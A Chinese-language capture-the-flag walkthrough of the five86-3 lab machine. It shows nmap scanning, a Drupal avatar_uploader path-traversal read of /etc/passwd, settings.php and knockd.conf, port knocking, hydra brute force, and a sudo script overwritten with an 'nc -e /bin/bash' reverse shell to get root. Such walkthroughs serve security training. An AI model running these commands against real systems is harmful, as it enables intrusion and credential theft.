five86-3靶机渗透实战

文笔生疏，措辞浅薄，望各位大佬不吝赐教，万分感谢

#主机探测-端口扫描

arp-scan -l
nmap -A -p- -min-rate 8888 192.168.43.16

#指纹识别-目录爆破

whatweb 192.168.43.16
dirsearch -u 192.168.43.16

#web界面

#CMS：drupal 7
试了一圈dirsearch爆破出来的路径，没啥鸟用
#发现有个注册，随便注册一个用户
#返回时，已是admin用户
#发现有图片上传
#尝试上传木马

#BP抓包上传木马

#先上传张图片抓包看看请求体
#复制
ontent-Disposition: form-data; name="files[picture_upload]"; filename="1.jpg"
Content-Type: image/jpeg
#再抓包上传马子
#改包，改格式--->上传成功
#百度一圈发现这个思路没啥鸟用，找不到上传路径

 

#搜drupal7的漏洞

#发现任意文件读取漏洞
#https://www.exploit-db.com/
#Exploit Code:
http://example.com/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd
#kali curl一下 浏览器看实在麻烦
#/etc/passwd  得到几个用户名
curl http://192.168.43.16/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd
#看下网站配置文件
curl http://192.168.43.16/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../var/www/html/sites/default/settings.php
#得到密码
'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'x4lB0XxX'

 

#ssh敲门

#唉，来个师傅解答一下：不指定22端口nmap就扫不到是咋回事
#先扫下22端口
nmap -p 22,80 -T4 -sT 192.168.43.16
#22端口被过滤了，猜测是由于knock配置导致，毕竟之前也学到过
#/etc/knockd.conf
curl http://192.168.43.16/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/knockd.conf
#15s内依次敲3个端口5004,4284,6872
#端口看房状态维持60s，过后需要再敲。
knock -d 200 192.168.43.16 5004 4284 6872
#再次查看22端口--->已是开启状态
namp -p 22 -sT 192.168.43.16

#ssh登录

#之前拿到了用户名和密码，hydra进行爆破
knock -d 200 192.168.43.16 5004 4284 6872
nmap -sT -p 22 192.168.43.16
hydra -L user.txt -P m.txt
#ssh登录sam
ssh sam@192.168.43.16

#sam信息收集

sudo -l
#可root权限执行restart-web.sh
#sam对web.sh具有读写权限

#提取

#kali
nc -lvvp 8888
#提权
echo  “nc -e /bin/bash 192.168.43.33 8888” > restart-web.sh
sudo ./restart-web.sh 

 

#FLAG

#kali反弹成功，拿到rootshell
id
cat /root/flag.txt